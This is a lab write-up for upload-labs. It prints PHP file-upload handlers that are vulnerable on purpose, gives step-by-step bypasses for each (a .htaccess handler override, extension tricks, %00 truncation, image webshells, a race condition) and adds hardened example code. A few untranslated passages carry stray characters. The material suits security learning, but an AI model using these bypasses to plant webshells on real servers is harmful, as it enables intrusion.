Upload-labs walkthrough notes (work in progress)

[Figure: vulnerability types covered by upload-labs]
[Figure: how to identify the type of an upload vulnerability]
[Figure: the upload process]

Pass-01 (front-end JS bypass)

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("請選擇要上傳的文件!");
        return false;
    }
    // file types allowed for upload
    var allow_ext = ".jpg|.png|.gif";
    // extract the uploaded file's extension
    var ext_name = file.substring(file.lastIndexOf("."));
    // check whether that extension is allowed
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "該文件不允許上傳,請上傳" + allow_ext + "類型的文件,當前文件類型為:" + ext_name;
        alert(errMsg);
        return false;
    }
}

Method 1: the check is done on the front end. A JavaScript check only ever runs on the client, so JavaScript can be disabled in the browser settings, or the checkFile() function here can simply be edited out.
After that a .php file can be uploaded directly; once it is uploaded, copy the image address to get the upload path.


Method 2: upload 1.png, intercept the request, and change the extension to php to get past the upload check.
The file ends up at /upload/1.php; connect with China Chopper (菜刀) to get a shell.

Pass-02 (MIME type bypass)

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'];
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '文件類型不正確,請重新上傳!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夾不存在,請手工創建!';
    }
}

This level restricts the MIME type (Content-Type) of the request, allowing only image/jpeg, image/png and image/gif image data. The procedure is the same as Method 2 in Pass-01.

Upload 1.png, intercept the request, and change the extension to php to get past the check.

The file ends up at /upload/1.php; connect with China Chopper to get a shell.

Pass-03 (bypass via alternative parsable extensions: php4, phtml)

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // strip the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '不允許上傳.asp,.aspx,.php,.jsp后綴文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夾不存在,請手工創建!';
    }
}

Looking at the source, the level uses an extension blacklist that forbids uploading .php. Since php2, php3, php4, php5, phps and phtml are parsed the same way, just change the extension to phps and upload.
Copy the image address to get the upload path.

Common extension bypasses

asp: asa, cer, cdx
aspx: ashx, asmx, ascx
php: php2, php3, php4, php5, phps, phtml
jsp: jspx, jspf

Pass-04 (uploading .htaccess)

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // strip the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '此文件不允許上傳!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夾不存在,請手工創建!';
    }
}

The blacklist is much longer this time, but .htaccess is still not filtered, so the file-parsing rules can be rewritten to bypass it. Upload a .htaccess file with the content below; it means that, in the upload directory, files matching 1.jpg are executed as PHP.

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

Upload the .htaccess file.
Then upload 1.jpg; because the parsing rules have been rewritten, 1.jpg will be executed as PHP.

Then connect with China Chopper directly.

getshell

.htaccess attack summary
Sometimes, because of the various lists, we may not be able to upload any php file at all, and there is nowhere else that will parse something as php. What then? If you can upload a .htaccess file, it becomes easy.
Create a .htaccess file with the following content:

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

Then upload a file named 1.jpg whose content is a one-line webshell; 1.jpg will be executed as if it were 1.php, and China Chopper can connect successfully.

Pass-05 (extension case bypass)

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // strip the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '此文件類型不允許上傳!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夾不存在,請手工創建!';
    }
}

Code comparison: Pass-04 vs Pass-05
The comparison shows that the blacklist now includes .htaccess,
but the code that lowercases the extension is gone,
so a case variation obviously bypasses it, e.g. .Php or .phP

Pass-06 (bypass with a trailing space after the extension)

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name); // remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // strip the string ::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '此文件不允許上傳';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夾不存在,請手工創建!';
    }
}

Code comparison: Pass-05 vs Pass-06
The trim that strips leading and trailing spaces from the file name has been removed, so 6.php followed by a space can be used.

Pass-07 (bypass with a trailing dot after the extension)

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // strip the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '此文件類型不允許上傳!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夾不存在,請手工創建!';
    }
}

Code comparison: Pass-06 vs Pass-07

The comparison shows that the operation removing trailing dots from the file name is gone,
so 7.php. can be used.

Pass-08 (::$DATA bypass)

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lowercase
        $file_ext = trim($file_ext); // trim leading and trailing whitespace
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '此文件類型不允許上傳!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夾不存在,請手工創建!';
    }
}

Code comparison: Pass-07 vs Pass-08

The comparison shows that the ::$DATA restriction has been removed here.
The ::$DATA alternate data stream exists on every file, so it can serve as an alternative way of accessing any file.
So use 8.php::$DATA

Windows ::DATA alternate data stream vulnerability:
https://www.owasp.org/index.php/Windows_::DATA_alternate_data_stream

Pass-09 (bypass combining dot and space)

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // strip the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上傳出錯!';
            }
        } else {
            $msg = '此文件類型不允許上傳!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夾不存在,請手工創建!';
    }
}

Code comparison: Pass-08 vs Pass-09
The comparison shows that the extension handling is not rigorous enough: it first removes the dot at the end of the file name and then trims the spaces from the extension, but each step runs only once, so 9.php. . can be uploaded. Although there is a trailing-dot removal and a whitespace trim,
they are not applied repeatedly,
so the name can be constructed as 9.php. .
After one round of processing it becomes 9.php.
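As an added example (not the lab's code), the same clean-up rules run to a fixpoint, next to a mirror of the single-pass order used in Pass-09, over the names from Pass-05 to Pass-09: it shows how 9.php. . slips past the single-pass order but not the loop. single_pass_ext, fixpoint_name and fixpoint_ext are names assumed here; the real fix is a whitelist of allowed extensions, not a longer deny list.

```php
<?php
// Added example, not upload-labs code. Mirrors the single-pass clean-up of
// Pass-09 and contrasts it with a version that repeats until nothing changes.

// Same order as the lab: trim, deldot (trailing dots only), take the
// extension, lowercase, drop ::$DATA, trim. Each step runs exactly once.
function single_pass_ext(string $name): string
{
    $name = trim($name);
    $name = rtrim($name, '.');                      // what deldot() does
    $ext  = strtolower((string) strrchr($name, '.'));
    $ext  = str_ireplace('::$DATA', '', $ext);
    return trim($ext);
}

// Hardened clean-up: apply every rule to the whole name and loop until the
// name stops changing, so "9.php. ." collapses to "9.php", not to "9.php. ".
function fixpoint_name(string $name): string
{
    do {
        $before = $name;
        $name = str_ireplace('::$DATA', '', $name);  // NTFS stream suffix
        $name = trim($name);                         // spaces at both ends
        $name = rtrim($name, '.');                   // trailing dots
    } while ($name !== $before);
    return $name;
}

function fixpoint_ext(string $name): string
{
    return strtolower((string) strrchr(fixpoint_name($name), '.'));
}

// Constructed inputs: the bypass names discussed on this page plus a benign one.
$samples = ['9.php. .', '6.php ', '7.php.', '8.php::$DATA', 'x.Php', 'ok.jpg'];
$deny    = ['.php', '.phtml', '.htaccess'];         // short stand-in deny list

foreach ($samples as $s) {
    $once = single_pass_ext($s);
    $fix  = fixpoint_ext($s);
    printf("%-16s once=%-8s fixpoint=%-8s blocked: once=%s fixpoint=%s\n",
        json_encode($s), json_encode($once), json_encode($fix),
        in_array($once, $deny, true) ? 'yes' : 'no',
        in_array($fix, $deny, true) ? 'yes' : 'no');
}
```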

Pass-10 (double extension bypass)

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;        
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上傳出錯!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夾不存在,請手工創建!';
    }
}

發(fā)現(xiàn)關(guān)鍵點

$file_name = str_ireplace($deny_ext,"", $file_name);

//將文件名($file_name)中含有黑名單($deny_ext)的替換為""(刪除黑名單字符)

但是代碼并未循環(huán)過濾乍恐,于是存在10.pphphp

image

菜刀連接
[圖片上傳失敗...(image-cec363-1563079608128)]
getshell
[圖片上傳失敗...(image-37400d-1563079608128)]

Pass-11 (%00 truncation bypass)

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上傳出錯!';
        }
    } else{
        $msg = "只允許上傳.jpg|.png|.gif類型文件!";
    }
}

發(fā)現(xiàn)關(guān)鍵點

 $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
 
 上傳文件路徑由路徑+時間+后綴重新命名

1.PHP 版本 < 5.3.4
2.php.ini 中 magic_quotes_gpc=off
滿足上面的條件的時候php就是把%00當成結(jié)束符茵烈,后面的數(shù)據(jù)直接忽略
save_path可控百匆,因此00截斷即可。利用save_path=../upload/11.php%00


image

現(xiàn)在貌似成功不了

Pass-12 (%00 truncation, as above)

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上傳失敗";
        }
    } else {
        $msg = "只允許上傳.jpg|.png|.gif類型文件!";
    }
}

Code comparison: Pass-11 vs Pass-12

The only difference from the previous level is that save_path comes from POST instead of GET, and %00 can no longer be used directly: in GET, %00 is URL-decoded into a null character, but in POST %00 is not URL-decoded, so the truncation has to be done in Burp Suite by changing the hex value to 00.
Append 12.php+ after upload (the + is added to make the hex value easy to change).

Here change 2b (the hex of '+') to 00.

Alternatively, append 12.php%00 after upload, then select %00 and apply URL-decode.

My environment was not set up properly, so this did not succeed, but that is the principle.
Below is a screenshot of someone else's successful attempt, found online.

$img_path = $_POST['save_path']."/".rand(10,99).date("YmdHis").".".$file_ext;
The part "/".rand(10, 99).date("YmdHis").".".$file_ext; is truncated away.

Pass-13 (image webshell)

function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); // read only the first 2 bytes
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
    $fileType = '';
    switch($typeCode){
        case 255216:            // 0xFF 0xD8: JPEG
            $fileType = 'jpg';
            break;
        case 13780:             // 0x89 0x50: PNG
            $fileType = 'png';
            break;
        case 7173:              // 0x47 0x49: GIF
            $fileType = 'gif';
            break;
        default:
            $fileType = 'unknown';
    }
    return $fileType;
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);

    if($file_type == 'unknown'){
        $msg = "文件未知,上傳失敗!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上傳出錯!";
        }
    }
}

This level relies on a function that identifies the file type:
fopen opens the file stream,
fread reads 2 bytes,
unpack unpacks the binary data; C stands for unsigned byte and the following 2 is the count (* can be used instead),
the two chars are concatenated and converted to an integer with intval.
An image webshell (a picture with a webshell appended) gets past it.
Making an image webshell
Method 1:
Take an image 1.jpg and a file 1.php containing a one-line webshell,
put 1.jpg and 1.php in the same directory,
then run copy 1.jpg/b + 1.php/a 2.jpg from cmd in that directory.
The newly generated 2.jpg is the finished image webshell.
Method 2:
Open an image 1.jpg in HxD,
append the one-line webshell at the end of the image and save; the saved image is the image webshell.

Pass-14 (bypassing getimagesize)

function isImage($filename){
    $types = '.jpeg|.png|.gif';
    if(file_exists($filename)){
        $info = getimagesize($filename);
        $ext = image_type_to_extension($info[2]);
        if(stripos($types,$ext)){
            return $ext;
        }else{
            return false;
        }
    }else{
        return false;
    }
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知,上傳失敗!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上傳出錯!";
        }
    }
}

getimagesize is a built-in function for identifying images, so the same image-webshell bypass works. See the official documentation: http://php.net/manual/zh/function.getimagesize.php

image_type_to_extension is a built-in function that returns the file extension for an image type: http://php.net/manual/zh/function.image-type-to-extension.php

Pass-15 (bypassing exif_imagetype)

function isImage($filename){
    // requires the php_exif extension to be enabled
    $image_type = exif_imagetype($filename);
    switch ($image_type) {
        case IMAGETYPE_GIF:
            return "gif";
            break;
        case IMAGETYPE_JPEG:
            return "jpg";
            break;
        case IMAGETYPE_PNG:
            return "png";
            break;    
        default:
            return false;
            break;
    }
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知,上傳失敗!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上傳出錯!";
        }
    }
}

exif_imagetype also determines the image type, so the same image-webshell bypass works. See the official documentation: http://php.net/manual/zh/function.exif-imagetype.php

Pass-16 (image re-rendering)

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // basic information about the uploaded file: name, type, size, temp path
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=UPLOAD_PATH.basename($filename);

    // extension of the uploaded file
    $fileext= substr(strrchr($filename,"."),1);

    // only upload when both the extension and the type are acceptable
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path))
        {
            // generate a new image from the uploaded one
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "該文件不是jpg格式的圖片!";
                @unlink($target_path);
            }else{
                // give the new image a file name
                srand(time());
                $newfilename = strval(rand()).".jpg";
                $newimagepath = UPLOAD_PATH.$newfilename;
                imagejpeg($im,$newimagepath);
                // show the re-rendered image (the new one generated from the user's upload)
                $img_path = UPLOAD_PATH.$newfilename;
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上傳出錯!";
        }
    }
    // the png and gif branches of the level follow the same pattern and are omitted here
}

The three code segments (jpg, png and gif) are almost identical, so only one is analysed. $target_path already uses basename, which blocks bypasses that tamper with the directory.
$fileext takes the characters after the last dot as the extension.

The value in $filetype is used to check whether the Content-Type is acceptable.

imagecreatefromjpeg checks whether the file is an image resource; see the official documentation: http://php.net/manual/zh/function.imagecreatefromjpeg.php

srand(time()) (see http://php.net/manual/zh/function.srand.php), combined with strval(rand()) below, seeds the random number generator so that the random file names of uploads do not repeat.
Re-rendering with imagecreatefromjpeg effectively extracts the part that is genuine image data and redraws it with the library's own API; in the process, anything that is not image data is discarded.

Detailed bypass method: https://secgeek.net/bookfresh-vulnerability/
The image-webshell POC.gif is provided in that article (at the very end).
Video demonstration (requires getting past the Great Firewall): https://youtu.be/z-_5a1wyPF0

Pass-17 (race condition, bypass by sending requests in bulk)

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允許上傳.jpg|.png|.gif類型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上傳出錯!';
    }
}

The extension is checked against a whitelist only after the file has been moved: if it matches, rename renames it; if not, unlink deletes the file.
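As an added example, not upload-labs code, here is one handler built the other way round from the levels above: it trusts neither the Content-Type nor the file name, sniffs and re-encodes the content, names the file itself and finishes every check before anything reaches the upload directory. UPLOAD_DIR, MAX_BYTES, ALLOWED and store_image are assumptions of this example; it needs PHP 8 (match), GD and fileinfo, and an upload directory that the web server never executes as PHP.

```php
<?php
// Added example, not upload-labs code: a handler built the other way round.
// Assumptions: UPLOAD_DIR is outside the web root (or served with
// AllowOverride None and PHP disabled); GD and fileinfo are loaded; PHP 8.
const UPLOAD_DIR = '/var/app/uploads';           // assumed path, not the lab's UPLOAD_PATH
const MAX_BYTES  = 2 * 1024 * 1024;

// Allowed types, keyed by the MIME type sniffed from the file CONTENT, never
// by the client's Content-Type header (Pass-02) or its file name (Pass-03..10).
const ALLOWED = [
    'image/jpeg' => ['ext' => 'jpg', 'type' => IMAGETYPE_JPEG],
    'image/png'  => ['ext' => 'png', 'type' => IMAGETYPE_PNG],
    'image/gif'  => ['ext' => 'gif', 'type' => IMAGETYPE_GIF],
];

// Returns the stored file name or throws. Nothing taken from the client's name
// or path is used on disk, so .htaccess, double extensions and %00 tricks
// (Pass-04, -10, -11, -12) have nothing to act on.
function store_image(array $f): string
{
    if (($f['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with error ' . $f['error']);
    }
    $tmp = $f['tmp_name'];
    if (!is_uploaded_file($tmp) || filesize($tmp) > MAX_BYTES) {
        throw new RuntimeException('not an uploaded file, or too large');
    }

    // 1. Magic-byte sniffing. An image with a webshell appended still passes
    //    this (Pass-13..15), which is why step 3 re-encodes the pixels.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException("rejected content type $mime");
    }
    $spec = ALLOWED[$mime];

    // 2. The image header must parse and agree with the sniffed type.
    $info = @getimagesize($tmp);
    if ($info === false || $info[2] !== $spec['type']) {
        throw new RuntimeException('image header does not parse');
    }

    // 3. Decode the pixels from the quarantined temp file and write a fresh
    //    encoding (Pass-16): bytes appended after the image data are dropped.
    $im = @imagecreatefromstring(file_get_contents($tmp));
    if ($im === false) {
        throw new RuntimeException('image data does not decode');
    }

    // 4. Server-chosen name: random, whitelisted extension, never a dotfile.
    $name = bin2hex(random_bytes(16)) . '.' . $spec['ext'];
    $dest = UPLOAD_DIR . '/' . $name;
    $ok = match ($spec['ext']) {
        'jpg' => imagejpeg($im, $dest, 85),
        'png' => imagepng($im, $dest),
        'gif' => imagegif($im, $dest),
    };
    imagedestroy($im);
    if (!$ok) {
        throw new RuntimeException('could not write re-encoded image');
    }
    // 5. Every check ran before anything reached UPLOAD_DIR, so there is no
    //    window in which a rejected file exists on disk (the Pass-17 race).
    return $name;
}

if (isset($_POST['submit'], $_FILES['upload_file'])) {
    try {
        echo 'stored as ' . store_image($_FILES['upload_file']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'upload rejected';
    }
}
```

Re-encoding removes appended bytes but not payloads hidden in pixel or palette data such as the Pass-16 POC, which is why the directory itself must never be executable.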
